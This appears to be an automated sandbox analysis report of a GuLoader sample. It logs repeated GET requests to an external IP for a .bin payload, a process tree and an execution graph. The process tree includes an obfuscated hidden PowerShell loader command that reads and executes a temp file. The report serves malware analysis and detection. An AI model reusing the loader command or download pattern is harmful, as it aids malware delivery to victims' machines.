          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
          Jan 8, 2025 16:31:06.175183058 CET146INData Raw: 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75
          Data Ascii: are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>
          Jan 8, 2025 16:31:16.192608118 CET192OUTGET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
          Host: 212.162.149.94
          Cache-Control: no-cache
          Jan 8, 2025 16:31:16.315717936 CET1236INHTTP/1.1 404 Not Found
          Content-Type: text/html
          Server: Microsoft-IIS/8.5
          Date: Wed, 08 Jan 2025 15:31:18 GMT
          Content-Length: 1245
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
          Jan 8, 2025 16:31:16.315728903 CET146INData Raw: 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75
          Data Ascii: are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>
          Jan 8, 2025 16:31:26.333314896 CET192OUTGET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
          Host: 212.162.149.94
          Cache-Control: no-cache
          Jan 8, 2025 16:31:26.456562996 CET1236INHTTP/1.1 404 Not Found
          Content-Type: text/html
          Server: Microsoft-IIS/8.5
          Date: Wed, 08 Jan 2025 15:31:28 GMT
          Content-Length: 1245
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
          Jan 8, 2025 16:31:36.474267960 CET192OUTGET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
          Host: 212.162.149.94
          Cache-Control: no-cache
          Jan 8, 2025 16:31:36.597064018 CET1236INHTTP/1.1 404 Not Found
          Content-Type: text/html
          Server: Microsoft-IIS/8.5
          Date: Wed, 08 Jan 2025 15:31:37 GMT
          Content-Length: 1245
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
          Jan 8, 2025 16:31:46.615514994 CET192OUTGET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
          Host: 212.162.149.94
          Cache-Control: no-cache
          Jan 8, 2025 16:31:46.738357067 CET1236INHTTP/1.1 404 Not Found
          Content-Type: text/html
          Server: Microsoft-IIS/8.5
          Date: Wed, 08 Jan 2025 15:31:47 GMT
          Content-Length: 1245
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
          Jan 8, 2025 16:31:56.867000103 CET192OUTGET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
          Host: 212.162.149.94
          Cache-Control: no-cache
          Jan 8, 2025 16:31:56.990747929 CET1236INHTTP/1.1 404 Not Found
          Content-Type: text/html
          Server: Microsoft-IIS/8.5
          Date: Wed, 08 Jan 2025 15:31:58 GMT
          Content-Length: 1245
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
          Jan 8, 2025 16:32:07.004817009 CET192OUTGET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
          Host: 212.162.149.94
          Cache-Control: no-cache
          Jan 8, 2025 16:32:07.127852917 CET1236INHTTP/1.1 404 Not Found
          Content-Type: text/html
          Server: Microsoft-IIS/8.5
          Date: Wed, 08 Jan 2025 15:32:08 GMT
          Content-Length: 1245
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
          Jan 8, 2025 16:32:17.146008015 CET192OUTGET /hapaASjpjADwmkbMzkaWEdnWGbt71.bin HTTP/1.1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
          Host: 212.162.149.94
          Cache-Control: no-cache
          Jan 8, 2025 16:32:17.268389940 CET1236INHTTP/1.1 404 Not Found
          Content-Type: text/html
          Server: Microsoft-IIS/8.5
          Date: Wed, 08 Jan 2025 15:32:19 GMT
          Content-Length: 1245
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e [TRUNCATED]
          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]


          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Click to jump to process

          Target ID:0
          Start time:10:29:10
          Start date:08/01/2025
          Path:C:\Users\user\Desktop\rArz0wnYVU.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\rArz0wnYVU.exe"
          Imagebase:0x400000
          File size:1'062'792 bytes
          MD5 hash:2C5D3252B0C8CE91C28211E0ED75A1F5
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          Target ID:2
          Start time:10:29:12
          Start date:08/01/2025
          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):true
          Commandline:powershell.exe -windowstyle hidden "$Salsas=gc -raw 'C:\Users\user\AppData\Local\Temp\alkylsulfater\Deprivable\Profascists46.Skr';$Huddler=$Salsas.SubString(9589,3);.$Huddler($Salsas)
          Imagebase:0x4f0000
          File size:433'152 bytes
          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:3
          Start time:10:29:12
          Start date:08/01/2025
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff6d64d0000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:5
          Start time:10:29:39
          Start date:08/01/2025
          Path:C:\Windows\SysWOW64\msiexec.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\SysWOW64\msiexec.exe"
          Imagebase:0xd0000
          File size:59'904 bytes
          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.3883422466.000000000398C000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
          Reputation:high
          Has exited:false

          Reset < >

            Execution Graph

            Execution Coverage:23.1%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:21.9%
            Total number of Nodes:1344
            Total number of Limit Nodes:37
            execution_graph 3972 402840 3973 402bbf 18 API calls 3972->3973 3975 40284e 3973->3975 3974 402864 3977 405d2e 2 API calls 3974->3977 3975->3974 3976 402bbf 18 API calls 3975->3976 3976->3974 3978 40286a 3977->3978 4000 405d53 GetFileAttributesW CreateFileW 3978->4000 3980 402877 3981 402883 GlobalAlloc 3980->3981 3982 40291a 3980->3982 3985 402911 CloseHandle 3981->3985 3986 40289c 3981->3986 3983 402922 DeleteFileW 3982->3983 3984 402935 3982->3984 3983->3984 3985->3982 4001 40336e SetFilePointer 3986->4001 3988 4028a2 3989 403358 ReadFile 3988->3989 3990 4028ab GlobalAlloc 3989->3990 3991 4028bb 3990->3991 3992 4028ef 3990->3992 3993 4030e7 45 API calls 3991->3993 3994 405e05 WriteFile 3992->3994 3995 4028c8 3993->3995 3996 4028fb GlobalFree 3994->3996 3998 4028e6 GlobalFree 3995->3998 3997 4030e7 45 API calls 3996->3997 3999 40290e 3997->3999 3998->3992 3999->3985 4000->3980 4001->3988 4002 401cc0 4003 402ba2 18 API calls 4002->4003 4004 401cc7 4003->4004 4005 402ba2 18 API calls 4004->4005 4006 401ccf GetDlgItem 4005->4006 4007 402531 4006->4007 4008 4029c0 4009 402ba2 18 API calls 4008->4009 4010 4029c6 4009->4010 4011 4029f9 4010->4011 4012 40281e 4010->4012 4014 4029d4 4010->4014 4011->4012 4013 4061a0 18 API calls 4011->4013 4013->4012 4014->4012 4016 4060c5 wsprintfW 4014->4016 4016->4012 3101 401fc3 3102 401fd5 3101->3102 3103 402087 3101->3103 3121 402bbf 3102->3121 3106 401423 25 API calls 3103->3106 3112 4021e1 3106->3112 3107 402bbf 18 API calls 3108 401fe5 3107->3108 3109 401ffb LoadLibraryExW 3108->3109 3110 401fed GetModuleHandleW 3108->3110 3109->3103 3111 40200c 3109->3111 3110->3109 3110->3111 3127 4065c7 WideCharToMultiByte 3111->3127 3115 402056 3133 4052dd 3115->3133 3116 40201d 3119 40202d 3116->3119 3130 401423 3116->3130 3119->3112 3120 402079 FreeLibrary 3119->3120 3120->3112 3122 402bcb 3121->3122 3144 4061a0 3122->3144 3125 401fdc 3125->3107 3128 4065f1 GetProcAddress 3127->3128 3129 402017 3127->3129 3128->3129 3129->3115 3129->3116 3131 4052dd 25 API calls 3130->3131 3132 401431 3131->3132 3132->3119 3134 40539a 3133->3134 3136 4052f8 3133->3136 3134->3119 3135 405314 lstrlenW 3138 405322 lstrlenW 3135->3138 3139 40533d 3135->3139 3136->3135 3137 4061a0 18 API calls 3136->3137 3137->3135 3138->3134 3140 405334 lstrcatW 3138->3140 3141 405350 3139->3141 3142 405343 SetWindowTextW 3139->3142 3140->3139 3141->3134 3143 405356 SendMessageW SendMessageW SendMessageW 3141->3143 3142->3141 3143->3134 3150 4061ad 3144->3150 3145 4063f8 3146 402bec 3145->3146 3178 40617e lstrcpynW 3145->3178 3146->3125 3162 406412 3146->3162 3148 406260 GetVersion 3148->3150 3149 4063c6 lstrlenW 3149->3150 3150->3145 3150->3148 3150->3149 3151 4061a0 10 API calls 3150->3151 3154 4062db GetSystemDirectoryW 3150->3154 3156 4062ee GetWindowsDirectoryW 3150->3156 3157 406412 5 API calls 3150->3157 3158 4061a0 10 API calls 3150->3158 3159 406367 lstrcatW 3150->3159 3160 406322 SHGetSpecialFolderLocation 